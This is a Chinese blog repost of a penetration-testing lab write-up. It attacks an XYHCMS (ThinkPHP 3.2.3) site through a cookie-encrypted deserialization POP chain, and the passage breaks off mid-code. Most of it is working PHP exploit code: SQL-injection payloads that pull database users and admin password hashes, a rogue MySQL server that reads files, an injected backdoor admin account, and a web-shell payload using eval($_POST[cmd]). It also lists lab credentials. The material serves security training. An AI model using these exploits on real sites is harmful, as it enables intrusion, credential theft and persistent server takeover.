我是靠谱客的博主 成就玉米,最近开发中收集的这篇文章主要介绍scaner从外网到内网域渗透笔记scaner 从外网到内网域渗透1.环境配置2.外网打点3.xyhcms漏洞分析4.linux提权5.内网渗透6.内网域渗透,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

scaner 从外网到内网域渗透

1.环境配置

1.1靶场信息

用到的虚拟机共有三个 分别是 12server-db 、12-dc 、web1

12server-db、web1 这两个可以使用桥接或者nat模式根据需求可以设置 网卡1

12-dc用的是VMnet 19 这台机子已经绑定ip

主机名ip账号和密码
web1192.168.0.160web1 root@123
db192.168.0.161 10.10.10.136administrator qweasd666
ad10.10.10.135scaneradministrator QWEasd000 scanerdb db123456

web1 网站 http://192.168.0.160/xyhai.php?s=/Login/index admin 123456qq

外网面板地址: http://116.27.231.161:8888/e955a525
内网面板地址: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359

db主机上的 mssql服务 sa freepass

在这里插入图片描述

2.1 网络拓扑图

在这里插入图片描述

2.外网打点

2.1 扫描端口

nmap -v -sV -A 192.168.0.160

PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http     Apache httpd
|_http-title: xE6x88x91xE7x9Ax84xE7xBDx91xE7xABx99
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
888/tcp  open   http     Apache httpd
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache
8888/tcp open   http     nginx
| http-title: xE5xAEx89xE5x85xA8xE5x85xA5xE5x8FxA3xE6xA0xA1xE9xAAx8CxE5xA4xB1xE8xB4xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods: 
|_  Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadmin

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jBO3iSlI-1672385126585)(项目四 scaner.assets/1.png)]

2.2 信息收集

访问端口发现这个是宝塔的控制面板

访问80端口

在这里插入图片描述

从 https://evalshell.com/ 找到几个漏洞

在这里插入图片描述

2.3 gobuster扫描网站

简单扫描一下 获取网站目录结构

gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o dir.txt 
/search               (Status: 200) [Size: 4375]
/archive              (Status: 200) [Size: 5485]
/index                (Status: 200) [Size: 10964]
/home                 (Status: 200) [Size: 10964]
/index.php            (Status: 200) [Size: 10964]
/home.php             (Status: 200) [Size: 10964]
/uploads              (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0                    (Status: 200) [Size: 10964]
/go                   (Status: 200) [Size: 0]
/index2               (Status: 200) [Size: 383]
/mobile               (Status: 200) [Size: 7627]
/member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php           (Status: 200) [Size: 7627]
/Home.php             (Status: 200) [Size: 10964]
/show                 (Status: 200) [Size: 2829]
/Home                 (Status: 200) [Size: 10964]
/special              (Status: 200) [Size: 4444]
/review               (Status: 200) [Size: 0]
/Search               (Status: 200) [Size: 4375]
/Index                (Status: 200) [Size: 10964]
/Archive              (Status: 200) [Size: 5485]
/guestbook            (Status: 200) [Size: 5129]
/avatar               (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public               (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE              (Status: 403) [Size: 262]
/Mobile               (Status: 200) [Size: 7627]
/Mobile.php           (Status: 200) [Size: 7627]
/Data                 (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App                  (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]
/Special              (Status: 200) [Size: 4444]
/Member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/Install              (Status: 301) [Size: 300] [--> http://192.168.0.160/Install/]
/Review               (Status: 200) [Size: 0]
/Include              (Status: 301) [Size: 300] [--> http://192.168.0.160/Include/]
/Go                   (Status: 200) [Size: 0]
/Show                 (Status: 200) [Size: 2829]
/Guestbook            (Status: 200) [Size: 5129]
/%3FRID%3D2671        (Status: 200) [Size: 10964]
/%3FRID%3D2671.php    (Status: 200) [Size: 10964]
/Index2               (Status: 200) [Size: 383]
/DAPLICENSE           (Status: 403) [Size: 262]

2.4 存在目录可浏览

在这里插入图片描述

敏感目录可浏览

http://192.168.0.160/App/

2.5 thinkphp日志目录

http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log

2.6 目录报错 得到网站路径

http://192.168.0.160/App/Runtime/common~runtime.php
Fatal error: Class 'ThinkThink' not found in /www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65

2.7 验证码识别+top100弱口令登录后台

从漏洞库得到信息基本都是关于后台有关联的 但是后台是有验证码防御的。

http://192.168.0.160/xyhai.php?s=/Login/index

测试验证码没有绕过的相关的漏洞 尝试验证码是否能识别

使用工具进行识别破解 验证码是可以识别出来但是进行穷举的时候 密码大于10次的时候会自动封禁ip

在这里插入图片描述

打算使用burpsuite 伪造ip进行识别穷举的 但是看到这段代码

当 $adv是true的时候才会进入才能伪造ip 使用burpsuite伪造ip是行不通了。

function get_client_ip($type = 0, $adv = false) {
        $type = $type ? 1 : 0;
        static $ip = NULL;
        if ($ip !== NULL) {
            return $ip[$type];
        }
        if ($adv) {
            if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
                $pos = array_search('unknown', $arr);
                if (false !== $pos) {
                    unset($arr[$pos]);
                }
                $ip = trim($arr[0]);
            } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ip = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ip = $_SERVER['REMOTE_ADDR'];
            }
        } elseif (isset($_SERVER['REMOTE_ADDR'])) {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $long = sprintf("%u", ip2long($ip));
        $ip = $long ? array($ip, $long) : array('0.0.0.0', 0);
        return $ip[$type];
   

可以试着购买代理池 编写脚本结合验证码识别再进行破解。

3.xyhcms漏洞分析

xyhcms是thinkphp3.2.3框架开发的,thinkphp的漏洞都是默认存在的。 痛失CVE之xyhcms(thinkphp3.2.3)反序列化 https://www.freebuf.com/articles/web/264645.html 作者说的这个版本是旧版,新版的版本已经把site.php放到一个随机值的目录下,因为网站存在目录可浏览

可以对其进行访问 192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php

在这里插入图片描述

在这里插入图片描述

P4tzizR6d CFG_COOKIE_ENCODE 加密的key 下个源码来分析一下

分析的版本是 xyhcms_v3.6_20210602

3.1 登录加密分析

App/Common/Common/function.php

function get_cookie($name, $key = '') {

	if (!isset($_COOKIE[$name])) {
		return null;
	}
	$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;

	$value = $_COOKIE[$name];
	$key = md5($key);
	$sc = new CommonLibSysCrypt($key);
	$value = $sc->php_decrypt($value);
	return unserialize($value);
}

/**
 * 设置cookie
 *
 * @param array $args
 * @return boolean
 */
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
	$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;

	$name = $args['name'];
	$expire = isset($args['expire']) ? $args['expire'] : null;
	$path = isset($args['path']) ? $args['path'] : '/';
	$domain = isset($args['domain']) ? $args['domain'] : null;
	$secure = isset($args['secure']) ? $args['secure'] : 0;
	$value = serialize($args['value']);

	$key = md5($key);
	$sc = new CommonLibSysCrypt($key);
	$value = $sc->php_encrypt($value);
	//setcookie($cookieName ,$cookie, time()+3600,'/','',false);
	return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间   0关闭浏览器即失效
}

在 这个get_cookie 函数里面 存在 unserialize 可以试着用反序列化进行一些pop调用。下面对这些函数进行注释

function get_cookie($name, $key = '') { //传入cookie的名 和加密的key 默认为空
	if (!isset($_COOKIE[$name])) { //判断是否有值 空就返回null 不为空就往下走
		return null;
	}
	$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; //这个key就是 从site.php里面获取

	$value = $_COOKIE[$name]; //得到cookie的值
	$key = md5($key); //key进行md5加密 
	$sc = new CommonLibSysCrypt($key); //将赋值到类的构造函数内
	$value = $sc->php_decrypt($value);//调用类中的 php_decrypt进行解密
	return unserialize($value); //将序列化的内容进行反序列化
}

查看调用的地方 还是挺多的

在这里插入图片描述

接着看下值是什么设置

function set_cookie($args, $key = '') {
	$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; //获取值  本地测试的值是 J8qp9z2vj

	$name = $args['name'];//获取name的键
	$expire = isset($args['expire']) ? $args['expire'] : null; 
	$path = isset($args['path']) ? $args['path'] : '/';
	$domain = isset($args['domain']) ? $args['domain'] : null;
	$secure = isset($args['secure']) ? $args['secure'] : 0;
	$value = serialize($args['value']); //这里设置设置值

	$key = md5($key);//md5加密key 
	$sc = new CommonLibSysCrypt($key);
	$value = $sc->php_encrypt($value); //进行加密处理
	//setcookie($cookieName ,$cookie, time()+3600,'/','',false);
	return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间   0关闭浏览器即失效
}

SysCrypt->php_encrypt 查看这个函数

namespace CommonLib;

class SysCrypt {

	private $crypt_key;

	// 构造函数 
	public function __construct($crypt_key) {
	   $this -> crypt_key = $crypt_key;
	}
	public function php_encrypt($txt) { //传入值 
	   srand((double)microtime() * 1000000);
	   $encrypt_key = md5(rand(0,32000));
	   $ctr = 0;
	   $tmp = '';
	   for($i = 0;$i<strlen($txt);$i++) {
	    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; //获取crypt_key进行处理
	    $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
	   }
	   return base64_encode(self::__key($tmp,$this -> crypt_key)); //处理后 base64加密返回值
	}
	
	public function php_decrypt($txt) {
	   $txt = self::__key(base64_decode($txt),$this -> crypt_key);
	   $tmp = '';
	   for($i = 0;$i < strlen($txt); $i++) {
	    $md5 = $txt[$i];
	    $tmp .= $txt[++$i] ^ $md5;
	   }
	   return $tmp;
	}
	
	private function __key($txt,$encrypt_key) {
	   $encrypt_key = md5($encrypt_key);
	   $ctr = 0;
	   $tmp = '';
	   for($i = 0; $i < strlen($txt); $i++) {
	    $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
	    $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
	   }
	   return $tmp;
	}
	
	public function __destruct() {
	   $this -> crypt_key = null;
	}
}

/*
$sc = new SysCrypt('phpwms');
$text = '110';
print($sc -> php_encrypt($text));
print('<br>');
print($sc -> php_decrypt($sc -> php_encrypt($text)));
*/
?>

VHtVZwQ1VT9SdghoAWxTOF9kBndUMgBmU38Abg== 这个是登录后nickname名的值

在这里插入图片描述
在这里插入图片描述

对其进行解
把代码加密和解密构造一下

<?php
class SysCrypt {

    private $crypt_key;

    // 构造函数
    public function __construct($crypt_key) {
        $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0,32000));
        $ctr = 0;
        $tmp = '';
        for($i = 0;$i<strlen($txt);$i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp,$this -> crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt),$this -> crypt_key);
        $tmp = '';
        for($i = 0;$i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt,$encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this -> crypt_key = null;
    }
}


/**
 * 得到指定cookie的值
 *
 * @param string $name
 */
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {

    $key ='J8qp9z2vj';

    $value = $name;
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_decrypt($value);
    return unserialize($value);
}

/**
 * 设置cookie
 *
 * @param array $args
 * @return boolean
 */
//使用时修改密钥$key 涉及金额结算请重新设计cookie存储格式
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
    $key ='J8qp9z2vj';
    $value = serialize($args);
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    //setcookie($cookieName ,$cookie, time()+3600,'/','',false);
   // return setcookie($name, $value, $expire, $path, $domain, $secure); //失效时间   0关闭浏览器即失效
}


//测试加密

echo set_cookie('moonsec');

//测试解密

echo get_cookie('AywIOgMyCWNSdgxsBGkAawU+BncAZgRiDiJTPQ==');



?>

从源码上可以看到登录网站是从cookie里面获取的,证明加密是没错的化 可以先构造一个hacker 再接着修改cookie查看是否再网页里

XXIBM1JiVD4EIApvBGcHYFVrC2wBcFN0BjM= 这个解密是hacker

在这里插入图片描述

这样证明加密方式是没错的。

3.2 thinkphp3.2.3反序列化漏洞

thinkphp3.2.3 这个版本是存在反序列化漏洞的。前人已经进行分析过。 https://xz.aliyun.com/t/9441 而xyhcms get_cookie存在 unserialize 这个是漏洞的触发点 通过生成的序列化文件进行 set_cookie 加密生成密文即可。

首先分析一下thinkphp3.2.3大致流程 寻找 类中的 __destruct函数,寻找调用链

Include/Library/Think/Image/Driver/Imagick.class.php

    public function __destruct() {
        empty($this->img) || $this->img->destroy(); //$this->img 这个部分是可控的
       
    }

接着看那个类调用 destroy() 只有两个类存在 destroy函数 分别是

在这里插入图片描述

Include/Library/Think/Session/Driver/Memcache.class.php
Include/Library/Think/Session/Driver/Db.class.php

把重点放在Memcache.class.php 内

	public function destroy($sessID) {
		return $this->handle->delete($this->sessionName.$sessID);
	}

看到 destroy($sessID)是存在参数的 但是在php7.0以上的版本会出现致命的错误让代码无法执行。在5.6版本提示错误 ,但是还会正常执行。接着找 哪个类 delete调用这个函数 。Include/Library/Think/Model.class.php

 public function delete($options = array()) {
		$pk = $this->getPk(); 
		if (empty($options) && empty($this->options['where'])) { 
			// 如果删除条件为空 则删除当前数据对象所对应的记录
			if (!empty($this->data) && isset($this->data[$pk])) {
				return $this->delete($this->data[$pk]);
			} else {
				return false;
			}

		}
		if (is_numeric($options) || is_string($options)) {
			// 根据主键删除记录
			if (strpos($options, ',')) {
				$where[$pk] = array('IN', $options);
			} else {
				$where[$pk] = $options;
			}
			$options          = array();
			$options['where'] = $where;
		}
		// 根据复合主键删除记录
		if (is_array($options) && (count($options) > 0) && is_array($pk)) {
			$count = 0;
			foreach (array_keys($options) as $key) {
				if (is_int($key)) {
					$count++;
				}

			}
			if ($count == count($pk)) {
				$i = 0;
				foreach ($pk as $field) {
					$where[$field] = $options[$i];
					unset($options[$i++]);
				}
				$options['where'] = $where;
			} else {
				return false;
			}
		}
		// 分析表达式
		$options = $this->_parseOptions($options);
		if (empty($options['where'])) {
			// 如果条件为空 不进行删除操作 除非设置 1=1
			return false;
		}

		//!is_array($pk) new add by gosea--20171016 --联合主键报错
		if (!is_array($pk) && is_array($options['where']) && isset($options['where'][$pk])) {
			$pkValue = $options['where'][$pk];
		}

		if (false === $this->_before_delete($options)) {
			return false;
		}
		$result = $this->db->delete($options);
		if (false !== $result && is_numeric($result)) {
			$data = array();
			if (isset($pkValue)) {
				$data[$pk] = $pkValue;
			}

			$this->_after_delete($data, $options);
		}
		// 返回删除记录个数
		return $result;
	}

这里主要看539 $result = t h i s − > d b − > d e l e t e ( this->db->delete( this>db>delete(options); 这里的db是可以传入一个对象的。即可以调用任何类的delete方法

Include/Library/Think/Db/Driver.class.php

 public function delete($options=array()) {
        $this->model  =   $options['model'];
        $this->parseBind(!empty($options['bind'])?$options['bind']:array());
        $table  =   $this->parseTable($options['table']); //这里获取table下标的内容
        $sql    =   'DELETE FROM '.$table;
        if(strpos($table,',')){// 多表删除支持USING和JOIN操作
            if(!empty($options['using'])){
                $sql .= ' USING '.$this->parseTable($options['using']).' ';
            }
            $sql .= $this->parseJoin(!empty($options['join'])?$options['join']:'');
        }
        $sql .= $this->parseWhere(!empty($options['where'])?$options['where']:'');
        if(!strpos($table,',')){
            // 单表删除支持order和limit
            $sql .= $this->parseOrder(!empty($options['order'])?$options['order']:'')
            .$this->parseLimit(!empty($options['limit'])?$options['limit']:'');
        }
        $sql .=   $this->parseComment(!empty($options['comment'])?$options['comment']:'');
        return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);
    }

跟进 execute $this->initConnect(true);

 /**
     * 初始化数据库连接
     * @access protected
     * @param boolean $master 主服务器
     * @return void
     */
    protected function initConnect($master=true) {
        if(!empty($this->config['deploy']))
            // 采用分布式数据库
            $this->_linkID = $this->multiConnect($master);
        else
            // 默认单数据库
            if ( !$this->_linkID ) $this->_linkID = $this->connect();
    }

跟进 $this->connect();

  public function connect($config='',$linkNum=0,$autoConnection=false) {
        if ( !isset($this->linkID[$linkNum]) ) {
            if(empty($config))  $config =   $this->config;
            try{
                if(empty($config['dsn'])) {
                    $config['dsn']  =   $this->parseDsn($config);
                }
                if(version_compare(PHP_VERSION,'5.3.6','<=')){ 
                    // 禁用模拟预处理语句
                    $this->options[PDO::ATTR_EMULATE_PREPARES]  =   false;
                }
                $this->linkID[$linkNum] = new PDO( $config['dsn'], $config['username'], $config['password'],$this->options);
            }catch (PDOException $e) {
                if($autoConnection){
                    trace($e->getMessage(),'','ERR');
                    return $this->connect($autoConnection,$linkNum);
                }else{
                    E($e->getMessage());
                }
            }
        }
        return $this->linkID[$linkNum];
    }

$this->config 这个部分是配置文件

    protected $config     = array(
        'type'              =>  '',     // 数据库类型
        'hostname'          =>  '127.0.0.1', // 服务器地址
        'database'          =>  '',          // 数据库名
        'username'          =>  '',      // 用户名
        'password'          =>  '',          // 密码
        'hostport'          =>  '',        // 端口     
        'dsn'               =>  '', //          
        'params'            =>  array(), // 数据库连接参数        
        'charset'           =>  'utf8',      // 数据库编码默认采用utf8  
        'prefix'            =>  '',    // 数据库表前缀
        'debug'             =>  false, // 数据库调试模式
        'deploy'            =>  0, // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)
        'rw_separate'       =>  false,       // 数据库读写是否分离 主从式有效
        'master_num'        =>  1, // 读写分离后 主服务器数量
        'slave_no'          =>  '', // 指定从服务器序号
        'db_like_fields'    =>  '', 
    );

通过pdo 连接数据库

  $this->linkID[$linkNum] = new PDO( $config['dsn'], $config['username'], $config['password'],$this->options);
            }catch (PDOException $e) {
                if($autoConnection){
                    trace($e->getMessage(),'','ERR');
                    return $this->connect($autoConnection,$linkNum);
                }else{
                    E($e->getMessage());
                }

抽象类abstract class Driver 需要被继承使用

在这里插入图片描述

选择 Mysql 所以执行

   public function insertAll($dataSet,$options=array(),$replace=false) {
        $values  =  array();
        $this->model  =   $options['model'];
        if(!is_array($dataSet[0])) return false;
        $this->parseBind(!empty($options['bind'])?$options['bind']:array());
        $fields =   array_map(array($this,'parseKey'),array_keys($dataSet[0]));
        foreach ($dataSet as $data){
            $value   =  array();
            foreach ($data as $key=>$val){
                if(is_array($val) && 'exp' == $val[0]){
                    $value[]   =  $val[1];
                }elseif(is_scalar($val)){
                    if(0===strpos($val,':') && in_array($val,array_keys($this->bind))){
                        $value[]   =   $this->parseValue($val);
                    }else{
                        $name       =   count($this->bind);
                        $value[]   =   ':'.$name;
                        $this->bindParam($name,$val);
                    }
                }
            }
            $values[]    = '('.implode(',', $value).')';
        }
        $sql   =  ($replace?'REPLACE':'INSERT').' INTO '.$this->parseTable($options['table']).' ('.implode(',', $fields).') VALUES '.implode(',',$values);
        $sql   .= $this->parseComment(!empty($options['comment'])?$options['comment']:'');
        return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);
    }

$this->execute 还是调用父类 Driver.class.php的execute去执行。

3.3 thinkphp3.2.3 pop链编写

exp可以参考 https://www.freebuf.com/articles/web/264645.html 和 https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA

其实都差不多。直接拿来用就可以了。

首先弄一个入口点 方便我们进行调试 当前你也可以直接用exp直接打就可以了。

<?php
namespace HomeController;

class Index2Controller extends HomeCommonController {
	//方法:index
	public function index() {
	    unserialize(base64_decode($_GET['id']));
    //    echo get_cookie('email');
		$this->display();


	}
}

pop链 exp直接拿来用了

<?php
namespace ThinkImageDriver;
use ThinkSessionDriverMemcache;
class Imagick{
    private $img;
    public function __construct(){
        $this->img = new Memcache();
    }
}

namespace ThinkSessionDriver;
use ThinkModel;
class Memcache {
    protected $handle;
    public function __construct(){
        $this->sessionName=null;
        $this->handle= new Model();
    }
}

namespace Think;
use ThinkDbDriverMysql;
class Model{
    protected $pk;
    protected $options;
    protected $data;
    protected $db;
    public function __construct(){
        $this->options['where']='';
        $this->pk='jiang';
        $this->data[$this->pk]=array(
            "table"=>"mysql.user where 1=updatexml(1,concat(0x7e,user()),1)#",
            "where"=>"1=1"
        );
        $this->db=new Mysql();
    }
}
namespace ThinkDbDriver;
use PDO;
class Mysql{
    protected $options ;  
    protected $config ;
    public function __construct(){
        $this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true );   // 开启才能读取文件
        $this->config= array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
        }
}

use ThinkImageDriverImagick;
echo base64_encode(serialize(new Imagick()));
http://www.xycms3.com/?s=home/index2&id=TzoyNjoiVGhpbmtcSW1hZ2VcRHJpdmVyXEltYWdpY2siOjE6e3M6MzE6IgBUaGlua1xJbWFnZVxEcml2ZXJcSW1hZ2ljawBpbWciO086Mjk6IlRoaW5rXFNlc3Npb25cRHJpdmVyXE1lbWNhY2hlIjoyOntzOjk6IgAqAGhhbmRsZSI7TzoxMToiVGhpbmtcTW9kZWwiOjQ6e3M6NToiACoAcGsiO3M6NToiamlhbmciO3M6MTA6IgAqAG9wdGlvbnMiO2E6MTp7czo1OiJ3aGVyZSI7czowOiIiO31zOjc6IgAqAGRhdGEiO2E6MTp7czo1OiJqaWFuZyI7YToyOntzOjU6InRhYmxlIjtzOjU0OiJteXNxbC51c2VyIHdoZXJlIDE9dXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdXNlcigpKSwxKSMiO3M6NToid2hlcmUiO3M6MzoiMT0xIjt9fXM6NToiACoAZGIiO086MjE6IlRoaW5rXERiXERyaXZlclxNeXNxbCI6Mjp7czoxMDoiACoAb3B0aW9ucyI7YToxOntpOjEwMDE7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjU6ImRlYnVnIjtpOjE7czo4OiJkYXRhYmFzZSI7czo1OiJteXNxbCI7czo4OiJob3N0bmFtZSI7czo5OiIxMjcuMC4wLjEiO3M6ODoiaG9zdHBvcnQiO3M6NDoiMzMwNiI7czo3OiJjaGFyc2V0IjtzOjQ6InV0ZjgiO3M6ODoidXNlcm5hbWUiO3M6NDoicm9vdCI7czo4OiJwYXNzd29yZCI7czo0OiJyb290Ijt9fX1zOjExOiJzZXNzaW9uTmFtZSI7Tjt9fQ==

在这里插入图片描述

在调试里发现root已经现实出来了 但是在页面内没有现实出来,但是在日志记录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SCTlAdmZ-1672385126621)(项目四 scaner.assets/119.png)]

获取密码

<?php
namespace ThinkImageDriver;
use ThinkSessionDriverMemcache;
class Imagick{
    private $img;
    public function __construct(){
        $this->img = new Memcache();
    }
}

namespace ThinkSessionDriver;
use ThinkModel;
class Memcache {
    protected $handle;
    public function __construct(){
        $this->sessionName=null;
        $this->handle= new Model();
    }
}

namespace Think;
use ThinkDbDriverMysql;
class Model{
    protected $pk;
    protected $options;
    protected $data;
    protected $db;
    public function __construct(){
        $this->options['where']='';
        $this->pk='jiang';
        $this->data[$this->pk]=array(
            "table"=>"mysql.user where 1=updatexml(1,(select password from xyh_admin limit 1),1)#",
            "where"=>"1=1"
        );
        $this->db=new Mysql();
    }
}
namespace ThinkDbDriver;
use PDO;
class Mysql{
    protected $options ;  
    protected $config ;
    public function __construct(){
        $this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true );   // 开启才能读取文件
        $this->config= array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
        }
}

use ThinkImageDriverImagick;
echo base64_encode(serialize(new Imagick()));

在这里插入图片描述

再来查看目标 首先要有目标的mysql账号和密码 可以利用mysql远程读取文件。

3.3 thinkphp 3.2.3 读取文件

下载 https://github.com/allyshka/Rogue-MySql-Server

把exp的数据库连接改成这个ip即可

<?php
namespace ThinkDbDriver;
use PDO;
class Mysql{
    protected $options = array(
        PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
        "dsn"    => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
        "username" => "root",
        "password" => "root"
    );
}

namespace Think;
class Model{
    protected $options   = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
        $this->db = new ThinkDbDriverMysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0"
        );
    }
}

namespace ThinkSessionDriver;
class Memcache{
    protected $handle;
    public function __construct() {
        $this->handle = new ThinkModel();
    }
}

namespace ThinkImageDriver;
class Imagick{
    private $img;
    public function __construct() {
        $this->img = new ThinkSessionDriverMemcache();
    }
}

namespace CommonLib;
class SysCrypt{

    private $crypt_key;
    public function __construct($crypt_key) {
        $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0,32000));
        $ctr = 0;
        $tmp = '';
        for($i = 0;$i<strlen($txt);$i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp,$this -> crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt),$this -> crypt_key);
        $tmp = '';
        for($i = 0;$i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt,$encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this -> crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = 'P4tzizR6d';
    $key = md5($key);
    $sc = new CommonLibSysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'P4tzizR6d';
    $value = serialize($args);
    $key = md5($key);
    $sc = new CommonLibSysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new ThinkImageDriverImagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

在这里插入图片描述

文件也读取到了

在这里插入图片描述

mysql的账号root 和密码 9a973fd7928bb3c2 数据库为 www_xycms_com 接着改exp

往管理员添加用户

 "where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);"

在这里插入图片描述

登录后台了。

3.4 xyhcms getshell

<?php
namespace ThinkDbDriver;
use PDO;
class Mysql{
    protected $options = array(
        PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
        "dsn"    => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306",
        "username" => "root",
        "password" => "9a973fd7928bb3c2"
    );
}

namespace Think;
class Model{
    protected $options   = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
        $this->db = new ThinkDbDriverMysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval($_POST[cmd]);</script>` varchar(10);",
        );
    }
}

namespace ThinkSessionDriver;
class Memcache{
    protected $handle;
    public function __construct() {
        $this->handle = new ThinkModel();
    }
}

namespace ThinkImageDriver;
class Imagick{
    private $img;
    public function __construct() {
        $this->img = new ThinkSessionDriverMemcache();
    }
}

namespace CommonLib;
class SysCrypt{

    private $crypt_key;
    public function __construct($crypt_key) {
        $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0,32000));
        $ctr = 0;
        $tmp = '';
        for($i = 0;$i<strlen($txt);$i++) {
